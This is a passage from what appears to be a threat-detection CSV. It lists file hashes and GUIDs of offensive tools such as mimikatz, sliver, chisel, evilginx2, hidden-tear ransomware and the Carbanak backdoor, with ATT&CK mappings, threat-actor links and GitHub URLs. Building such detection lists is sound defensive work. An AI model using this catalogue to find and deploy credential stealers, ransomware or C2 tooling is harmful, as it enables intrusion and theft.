TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#GUIDproject","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","23647" "*28d2ed9659825ef2b0d27409423ead074c9fb88f28b2186a79bf0f849beee0f1*",".{0,1000}28d2ed9659825ef2b0d27409423ead074c9fb88f28b2186a79bf0f849beee0f1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23648" "*28d6f30edd65e655cdc9b541b7cf46daa199b4bd1557b42f520119ef4c6a481f*",".{0,1000}28d6f30edd65e655cdc9b541b7cf46daa199b4bd1557b42f520119ef4c6a481f.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","23649" "*28dd3615a9603eb17b828c09dbc2d7eb66ff096389c76b383076bda48ee146b2*",".{0,1000}28dd3615a9603eb17b828c09dbc2d7eb66ff096389c76b383076bda48ee146b2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23651" 
"*28e899105aafa4f17c8a0d81d2f6664926afe59ff8c35e076ba2976291521300*",".{0,1000}28e899105aafa4f17c8a0d81d2f6664926afe59ff8c35e076ba2976291521300.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23652" "*28e899105aafa4f17c8a0d81d2f6664926afe59ff8c35e076ba2976291521300*",".{0,1000}28e899105aafa4f17c8a0d81d2f6664926afe59ff8c35e076ba2976291521300.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","23653" "*28e90498456b5e0866fde4371f560e5673f75e761855b73b063eadaef39834d2*",".{0,1000}28e90498456b5e0866fde4371f560e5673f75e761855b73b063eadaef39834d2.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","#filehash","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","23654" "*28f3463d7e6c3c5cc339f624712cee8e8277fffc2c6a4bf356cd4cb59ab4efce*",".{0,1000}28f3463d7e6c3c5cc339f624712cee8e8277fffc2c6a4bf356cd4cb59ab4efce.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","23655" "*28F9E001-67E0-4200-B120-3021596689E9*",".{0,1000}28F9E001\-67E0\-4200\-B120\-3021596689E9.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation 
tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","23657" "*2900497db81e411f0eca52c308b18a7753eb6a7609e702af310773383dc0a1b0*",".{0,1000}2900497db81e411f0eca52c308b18a7753eb6a7609e702af310773383dc0a1b0.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23658" "*290083a0a3dac6b3c05ab3e01fb5cdfb128c0175914f1fe64cdb1a5e247d43f0*",".{0,1000}290083a0a3dac6b3c05ab3e01fb5cdfb128c0175914f1fe64cdb1a5e247d43f0.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#filehash","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","23659" "*29021B28-61F9-492D-BB51-7CA8889087E5*",".{0,1000}29021B28\-61F9\-492D\-BB51\-7CA8889087E5.{0,1000}","offensive_tool_keyword","DitExplorer","Tool for viewing NTDS.dit","T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/DitExplorer","1","0","#GUIDProject","N/A","10","2","155","13","2025-03-14T13:02:44Z","2025-02-12T15:54:04Z","23660" 
"*29036ee321d9b71ca990840cc14527ea83a24b968d0443b155a18c388f667244*",".{0,1000}29036ee321d9b71ca990840cc14527ea83a24b968d0443b155a18c388f667244.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23661" "*290aadd32b485a7b190c623da4cf6069e25cb58a0e86231443cea3fde5082532*",".{0,1000}290aadd32b485a7b190c623da4cf6069e25cb58a0e86231443cea3fde5082532.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23663" "*290d030d8061bad86860efb7b4ae29b7a9359cfb8b33fc8e5cdb3fad3c645f8e*",".{0,1000}290d030d8061bad86860efb7b4ae29b7a9359cfb8b33fc8e5cdb3fad3c645f8e.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23664" 
"*29130af313a863e17612085d8ffefd98e2002d989757283656d870202cd18847*",".{0,1000}29130af313a863e17612085d8ffefd98e2002d989757283656d870202cd18847.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","23665" "*291489426e1f243b020216a872a8a1dd7d4aef1f44e352fa4b797db496f3701a*",".{0,1000}291489426e1f243b020216a872a8a1dd7d4aef1f44e352fa4b797db496f3701a.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","23666" "*29169875afabc27c2b4184d94689aae0955a6d8a7d11788fa3337efd807077ba*",".{0,1000}29169875afabc27c2b4184d94689aae0955a6d8a7d11788fa3337efd807077ba.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. 
This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","#filehash","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","23667" "*291a6968a3f7f2092c656d0275c604182d6f7ee7b813460aeb8b28c06d804b5e*",".{0,1000}291a6968a3f7f2092c656d0275c604182d6f7ee7b813460aeb8b28c06d804b5e.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","23668" "*291cf10eee25d10b0ddaddfb68b643dab252c1466fa4e813bb753b19b6604ef1*",".{0,1000}291cf10eee25d10b0ddaddfb68b643dab252c1466fa4e813bb753b19b6604ef1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23669" "*291e64d8729dd0c25a58e3ed6b377e519c3cdbfa962ee88b15f950e1449363f5*",".{0,1000}291e64d8729dd0c25a58e3ed6b377e519c3cdbfa962ee88b15f950e1449363f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23670" "*2920df6a2de4e198af944c9536c96ebc8e8289bb48792fe52e1d5de1747b41d3*",".{0,1000}2920df6a2de4e198af944c9536c96ebc8e8289bb48792fe52e1d5de1747b41d3.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","23672" "*292a7cd013a3291a7d1b0004c6da3ce863dcca353f77935b385e97649eac39d4*",".{0,1000}292a7cd013a3291a7d1b0004c6da3ce863dcca353f77935b385e97649eac39d4.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","23674" "*292ac9fa8bee24377c4576b233b8d56afabe4a667aa7f08432419fef0114ea9c*",".{0,1000}292ac9fa8bee24377c4576b233b8d56afabe4a667aa7f08432419fef0114ea9c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23675" "*293425d211b70219ee0ca753b3fcd56b44c369db44d9a7509614d31505b7e0e4*",".{0,1000}293425d211b70219ee0ca753b3fcd56b44c369db44d9a7509614d31505b7e0e4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23676" "*29390239-C06E-4F26-B5A3-594A08D8D30C*",".{0,1000}29390239\-C06E\-4F26\-B5A3\-594A08D8D30C.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","23678" "*293ad8aff285084f5430efae637fae32ae46e0e72f4a2a80bcfe7da35628cfd7*",".{0,1000}293ad8aff285084f5430efae637fae32ae46e0e72f4a2a80bcfe7da35628cfd7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23680" "*29446C11-A1A5-47F6-B418-0D699C6C3339*",".{0,1000}29446C11\-A1A5\-47F6\-B418\-0D699C6C3339.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","#GUIDproject","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","23681" "*2944dbfc-8a1e-4759-a8a2-e4568950601d*",".{0,1000}2944dbfc\-8a1e\-4759\-a8a2\-e4568950601d.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","23682" "*29487e77a2dfcc7b58d901ed412c86d7b99569f640dc3b8a81a611bbf8f7c1d3*",".{0,1000}29487e77a2dfcc7b58d901ed412c86d7b99569f640dc3b8a81a611bbf8f7c1d3.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - 
TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","23683" "*2949af17b0dd766d99667bcc09646f484583cd7dcc0216fd626b517b47a91a73*",".{0,1000}2949af17b0dd766d99667bcc09646f484583cd7dcc0216fd626b517b47a91a73.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","23684" "*2951bc5d8e2a90fef2f61add1dd98aa688862958edc8501acab5dd0782a52171*",".{0,1000}2951bc5d8e2a90fef2f61add1dd98aa688862958edc8501acab5dd0782a52171.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23685" "*2952a3dbebc375e94bafc4a6fcfa3ccfa8993525779bb29b26684e21bcebd7c3*",".{0,1000}2952a3dbebc375e94bafc4a6fcfa3ccfa8993525779bb29b26684e21bcebd7c3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23686" "*295850b32709c33d6cf6719301a9a26b29294f6edda200320e6869ff660915ba*",".{0,1000}295850b32709c33d6cf6719301a9a26b29294f6edda200320e6869ff660915ba.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23688" "*295eb7f2a9039a3ef9552eda6ddeb1d442810621de623fd08a010514fe588d35*",".{0,1000}295eb7f2a9039a3ef9552eda6ddeb1d442810621de623fd08a010514fe588d35.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23689" "*29601a1a4939f36c5d6995124862ce5c3c7e2a64b230fd9f1c04f0f52558b5ad*",".{0,1000}29601a1a4939f36c5d6995124862ce5c3c7e2a64b230fd9f1c04f0f52558b5ad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23690" "*296176cf45851a6671437cced0cbfaf3aadf9c5d717ea973f911928a36a78442*",".{0,1000}296176cf45851a6671437cced0cbfaf3aadf9c5d717ea973f911928a36a78442.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","23691" "*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*",".{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#GUIDproject","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","23692" "*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*",".{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#GUIDproject","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","23693" "*296de887d687f4c1146c57e9157c343f9f8ddccfc79f8f5033f0a57d443e0ad7*",".{0,1000}296de887d687f4c1146c57e9157c343f9f8ddccfc79f8f5033f0a57d443e0ad7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23694" "*298047e6ce299b73ea411a8ed2d67484db6c8c276a299403e0b9766cc9079456*",".{0,1000}298047e6ce299b73ea411a8ed2d67484db6c8c276a299403e0b9766cc9079456.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","23696" "*29870f133ff5c55180d76548434106644092b56c1de103b909035c1ebbd3ab83*",".{0,1000}29870f133ff5c55180d76548434106644092b56c1de103b909035c1ebbd3ab83.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23697" "*298b911716e8e00db371d0ba90a51b1e887ab4edafe2e998d73964ce1f85ace6*",".{0,1000}298b911716e8e00db371d0ba90a51b1e887ab4edafe2e998d73964ce1f85ace6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23698" "*2990d1f4243fdfc99c3da1be020ee516ef530be55e2769d2526e4672e32b40f5*",".{0,1000}2990d1f4243fdfc99c3da1be020ee516ef530be55e2769d2526e4672e32b40f5.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense 
Evasion","https://github.com/INotGreen/SharpThief","1","0","#filehash","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","23700" "*29955ba1e2193047ee5f4561445f81e218ae4de1a295f8fd296ad536bf381f17*",".{0,1000}29955ba1e2193047ee5f4561445f81e218ae4de1a295f8fd296ad536bf381f17.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","23701" "*299a1d70cfed99dc99e32c2b930207c539886f8277794f7b25edbc8ecba0930e*",".{0,1000}299a1d70cfed99dc99e32c2b930207c539886f8277794f7b25edbc8ecba0930e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23702" 